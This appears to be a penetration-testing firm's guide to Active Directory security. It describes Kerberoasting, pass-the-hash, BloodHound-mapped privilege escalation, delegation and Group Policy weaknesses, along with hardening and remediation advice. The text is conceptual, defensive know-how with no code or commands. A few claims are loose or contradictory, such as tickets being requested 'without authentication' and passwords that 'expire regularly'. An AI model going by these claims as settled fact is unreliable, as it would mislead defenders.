Why Active Directory Security Matters
Active Directory is the heart of identity and access management in most enterprise organizations. It manages user authentication and authorization for Windows computers, email systems, file shares, web applications, and countless other resources. Compromising Active Directory gives an attacker complete control over your organization's IT infrastructure and access to all systems and data managed by AD.
For more details, see our guides on internal network penetration testing, external network penetration testing, ransomware penetration testing.The severity of Active Directory compromise is evidenced by the frequency with which attackers target it. Active Directory attacks are a standard component of most sophisticated breach campaigns. Once an attacker compromises a user account in Active Directory, they can escalate to administrative access through privilege escalation attacks, move laterally across the network to access sensitive systems, and maintain persistence through backdoors and stolen credentials. Many of the worst breaches in recent years have been enabled by compromised Active Directory credentials and weak AD security configurations.
Yet many organizations have weak Active Directory security. Default configurations are often insecure. Older implementations accumulate misconfigurations and deprecated accounts over years of operation. Password policies are sometimes weaker than they should be. Security monitoring might be inadequate. Penetration testing specifically focused on Active Directory security identifies these weaknesses before attackers exploit them.
Understanding the Active Directory Attack Surface
Active Directory's attack surface extends beyond just compromising user credentials. Attackers can exploit multiple vulnerabilities in how Active Directory is configured and used to achieve domain compromise.
The domain controller itself is a critical attack target. Domain controllers authenticate all users and authorize all resource access. Compromising a domain controller gives attackers complete control over the domain. Penetration testing should evaluate whether domain controllers are properly protected with strong authentication, network segmentation, and access controls. Domain controllers should only be accessible to authorized administrators through secure channels, not accessible directly from user workstations.
User accounts represent another attack vector. Weak passwords allow credential stuffing or brute force attacks. Disabled password expiration policies allow stolen passwords to remain valid indefinitely. Default or shared accounts create opportunities for unauthorized access. Service accounts that don't follow the principle of least privilege can be exploited to gain excessive access. Penetration testing should identify weak password policies, accounts with weak or default passwords, disabled security controls, and accounts with excessive permissions.
The Kerberos authentication protocol used by Active Directory has several known attack vectors. Attackers with network access can sniff unencrypted Kerberos traffic, attempt password spray attacks where they try common passwords against many accounts, or use more sophisticated techniques like Kerberoasting to extract password hashes from Kerberos tickets that can be cracked offline.
Group Policy is another critical component of Active Directory. Group policies configure security settings, deploy software, map network drives, and manage countless other aspects of the Windows environment. Misconfigured group policies can disable security settings on client computers, weaken authentication requirements, or grant excessive permissions. Penetration testing should evaluate whether group policies are properly configured and whether attackers could exploit policy misconfigurations.
Delegation of administration through security groups can be exploited if groups are too broadly scoped. If all administrators are in a single global group with excessive permissions, compromise of any administrator account might compromise the entire domain. Least-privilege administration where different roles have access to only the resources they need reduces the impact of account compromise.
Common Active Directory Vulnerabilities
Certain vulnerabilities appear repeatedly in Active Directory environments. Penetration testing should specifically look for these common issues.
Weak password policies represent a widespread vulnerability. Many organizations still allow passwords as short as four or six characters, don't require password changes, or use predictable password formats. Weak passwords can be cracked through offline attacks after password hashes are stolen. Accounts with weak or default passwords can be compromised through brute force or credential stuffing attacks. Modern password policies should require long passwords (at least 12-16 characters), allow complex character sets, and expire regularly.
Disabled security features are surprisingly common. Some organizations disable account lockout policies to reduce help desk tickets from locked accounts. Others disable password complexity requirements because users complain about complexity. Some leave NTLM authentication enabled for backward compatibility with legacy systems, even though NTLM is cryptographically broken. Penetration testing should identify security features that have been disabled and help organizations understand the security risk of disabling them.
Overly permissive permissions on shared network resources create opportunities for unauthorized access and lateral movement. If all domain users have read access to file shares containing sensitive data, and attackers compromise any user account, they can access all that data. Permissions should follow the principle of least privilege where users have access only to resources they need for their job functions.
Service accounts that don't follow least-privilege principles represent a significant risk. A service account that's a member of the Domain Admins group gives attackers domain administrator access if they compromise the service account. Service accounts should have only the minimum permissions necessary to perform their function, and administrative service accounts should be rare exceptions.
Insecure delegation settings allow compromise of one resource to escalate to compromise of other resources. Unconstrained delegation allows a service to impersonate users accessing other services. If a service is compromised, attackers can impersonate administrators and access other systems. Penetration testing should identify unconstrained delegation and help organizations migrate to constrained or resource-based delegation.
Kerberoasting Attacks
Kerberoasting is one of the most practical attacks against Active Directory. The attack exploits how Kerberos authentication works to extract password hashes that can be cracked offline.
In Kerberos authentication, when a user requests access to a service, the authentication server provides a ticket encrypted with the service account's password hash. The user presents this ticket to the service, proving they're authenticated. The flaw in this design is that the ticket is encrypted with the service account's password - and any domain user can request these tickets without authentication.
A Kerberoasting attack works as follows: the attacker, authenticated as any domain user, requests Kerberos tickets for service accounts. Kerberos provides tickets encrypted with the service accounts' password hashes. The attacker extracts these encrypted tickets and uses password cracking tools to attempt to crack the passwords offline. If the service account has a weak password, the attacker can crack it and gain access using that service account's credentials.
Kerberoasting is dangerous because it's simple to execute and doesn't trigger security alerts. Any domain user can perform it. It doesn't access the network maliciously or trigger intrusion detection systems. It simply requests Kerberos tickets that the authentication server willingly provides.
Penetration testing should specifically test for Kerberoasting vulnerabilities. Testers should request Kerberos tickets for service accounts and attempt to crack passwords offline. If service account passwords are weak, testing should confirm that they can be cracked. Remediation for Kerberoasting includes using strong passwords for service accounts (long, complex passwords that resist cracking), and better yet, migrating to managed service account or group managed service account (GMSA/gMSA) functionality which automatically generates and rotates strong passwords.
Pass-the-Hash and Credential Theft Attacks
Windows systems store password hashes in memory and on disk. If an attacker can steal these hashes, they can use them to authenticate as the user without knowing the actual password. This attack is called pass-the-hash.
Pass-the-hash attacks are possible because Windows authenticates using cryptographic hashes. A stolen hash can be used to authenticate to other systems, assuming those systems use the same authentication method. If an attacker compromises a user's credentials and extracts the password hash from memory on their compromised system, the hash can be used to authenticate to file servers, email servers, or other systems using the same user account.
Protecting against pass-the-hash attacks requires multiple controls. Enforcing strong passwords makes password cracking difficult. Enabling credential guard on Windows 10 and newer systems prevents attackers from extracting credentials even from compromised machines. Restricting where high-privilege accounts can authenticate (restricting domain admin accounts from logging into user workstations) limits the impact of credential theft. Network segmentation prevents compromised machines from accessing sensitive systems.
Penetration testing should attempt to steal credentials from compromised systems and use those stolen credentials to access other systems. Testing should confirm whether stolen credentials can be used for lateral movement, and if so, help identify where network segmentation and access controls should be strengthened.
Privilege Escalation in Active Directory
Once attackers compromise a standard user account, they typically don't stop. They escalate privileges to gain administrative access, which allows them to compromise additional systems and maintain persistence.
Active Directory has many privilege escalation paths. A user with SeEnableDelegationPrivilege can create a delegation relationship that allows impersonating users. Users with WriteDacl permission on objects can modify ACLs to grant themselves additional permissions. Users who can reset passwords for accounts in privileged groups can compromise those accounts. Attackers might identify chains of permissions that lead from a compromised user account to domain administrator access.
Tools like BloodHound map out these attack paths visually, showing penetration testers and attackers potential privilege escalation chains. For example, a compromised user might have write access to the Group Policy Object applied to domain administrators. By modifying the GPO, the attacker can execute code as the domain administrator. Or a compromised user might be able to reset the password of a service account. If that service account is used to run a privileged service, compromising it might provide high-privilege code execution.
Penetration testing should use tools like BloodHound to map out privilege escalation paths and identify which paths can actually be exploited. Testing should confirm whether attackers can progress from compromising a standard user account to obtaining domain administrator access. If privilege escalation paths exist, remediation focuses on removing unnecessary permissions or limiting permissions to least-privilege, eliminating the escalation chains.
Group Policy Misconfigurations
Group Policy is a powerful tool for managing Windows environments at scale. Thousands of settings can be configured and applied to computers, users, and resources. However, Group Policy can also introduce security vulnerabilities if misconfigurations disable security settings or grant excessive permissions.
Common Group Policy misconfigurations include disabling antivirus software, disabling Windows Defender, disabling automatic updates, disabling Windows Firewall, or weakening authentication requirements. Some organizations apply overly permissive group policies globally instead of scoping them to specific OUs where they're needed. The result is that security controls are disabled on systems where they shouldn't be, creating vulnerabilities.
Penetration testing should review all group policies applied in the domain, looking for policies that disable security settings or create security vulnerabilities. Testing should also verify whether group policies are properly scoped to appropriate organizational units. A security policy applied globally might not be intended for all systems. Policies should be scoped to specific sets of computers based on legitimate operational needs.
Testing should also verify that group policies are properly enforced. Attackers who compromise a machine might disable group policy enforcement, allowing them to disable security settings. Proper configuration should prevent users from disabling group policy enforcement.
Domain Controller Security and Hardening
Domain controllers are the most critical systems in an Active Directory environment. Compromising a domain controller gives attackers complete control over the domain. Yet domain controllers are sometimes not as well-protected as they should be.
Domain controllers should be highly restricted systems accessible only to authorized administrators through secure channels. Network segmentation should prevent user workstations from directly accessing domain controllers. Access to domain controllers should require multi-factor authentication. Administrative access should be granted using just-in-time access provisioning rather than standing access. These controls limit the impact if administrator credentials are compromised or if an attacker gains access to the network.
Domain controllers should run only the services necessary to provide identity services. Additional services running on domain controllers expand the attack surface. Domain controllers should not run email, web, or application servers. They should not host shared file storage or other general-purpose services. The more services running, the more potential vulnerabilities and attack vectors.
Penetration testing should evaluate domain controller access controls. Can unauthorized users access domain controllers? Can users access domain controllers without appropriate authentication? Can attackers laterally move to domain controllers from compromised user workstations? Proper security means domain controllers are effectively isolated from general user access and only accessible to authorized administrators.
Azure AD and Hybrid Identity Testing
Many organizations use Azure AD (Microsoft Entra ID) for cloud authentication, often in hybrid environments where both on-premises Active Directory and Azure AD are in use. Hybrid environments introduce additional complexity and attack surface.
Azure AD Connect synchronizes accounts and passwords between on-premises AD and Azure AD. Compromising Azure AD Connect can compromise both directories. Password hash synchronization, password writeback, and other sync features create attack paths. Penetration testing should evaluate Azure AD Connect security, including whether the service account is properly secured and whether synchronization is properly configured.
Hybrid environments can also introduce complexity in managing permissions. A user might have permissions in on-premises AD but not in Azure AD, or vice versa. Attackers might exploit these differences to gain access. Testing should evaluate permission consistency across both directories and identify opportunities for unauthorized access.
Cloud-based resources accessed through Azure AD should also be tested. Azure AD conditional access policies control where and how users can authenticate. If policies are poorly configured, attackers might bypass MFA requirements or access resources from unauthorized locations. Testing should verify that conditional access policies are properly enforced.
Building a Comprehensive Active Directory Penetration Test
A comprehensive Active Directory penetration test requires specialized expertise. Testing should include external attacks against the domain (for example, attempting to enumerate user accounts and brute force passwords from outside the domain), internal attacks from a compromised user workstation, and testing of administrative functions.
External testing should simulate attackers from outside your network attempting to compromise credentials. This includes password spray attacks, credential stuffing if leaked credentials are known, and enumeration attacks to map out the Active Directory structure. Testing should confirm whether attackers can compromise credentials before gaining network access, or whether initial compromise requires network access.
Internal testing should simulate an attacker who has compromised a user workstation or a standard user account. From that starting point, testing should identify privilege escalation paths to domain administrator access. Testing should map out lateral movement options and identify which systems can be accessed with compromised credentials.
Administrative testing should verify that administrative functions are properly secured. Can an attacker compromise an administrative account and maintain persistence? Can they disable audit logging to hide their activities? Can they create backdoor accounts? Testing should confirm that administrative actions are properly logged and monitored.
Choosing Your Active Directory Penetration Testing Partner
Active Directory penetration testing requires specialized expertise. When selecting a testing partner, look for firms with demonstrated experience testing Active Directory environments, familiarity with attack tools like Mimikatz and BloodHound, understanding of Kerberos authentication and Windows security, and ability to test both on-premises AD and hybrid Azure AD environments if relevant to your organization.
Your testing partner should understand your organization's specific configuration, deployment model, and the business-critical systems that depend on Active Directory. They should provide clear documentation of findings, explain how vulnerabilities could be exploited, and offer practical recommendations for remediation.
After testing, prioritize remediation of critical findings. Domain administrator compromises should be addressed immediately. Kerberoasting vulnerabilities should be remediated by improving service account password policies. Privilege escalation paths should be eliminated by removing unnecessary permissions. Regular remediation validation should confirm that fixes actually address the vulnerabilities.
Ongoing Active Directory Security
Penetration testing identifies vulnerabilities at a point in time. However, Active Directory changes constantly. Users are added and removed. Accounts are granted new permissions. Systems are added to the domain. New group policies are applied. These changes can introduce new vulnerabilities.
Effective Active Directory security requires ongoing monitoring and testing, not just periodic penetration testing. Implement continuous monitoring of Active Directory changes. Alert on suspicious activities like multiple failed authentication attempts, privilege escalation attempts, or unexpected administrative activities. Regularly review permissions to ensure they still follow the principle of least privilege. Periodically rescan for vulnerabilities using Active Directory security assessment tools.
Regular penetration testing, combined with continuous monitoring, creates multiple layers of protection. Penetration testing identifies vulnerabilities that attackers could exploit. Continuous monitoring detects when attacks are occurring. Together, these controls significantly reduce the likelihood of successful Active Directory compromise and data breach.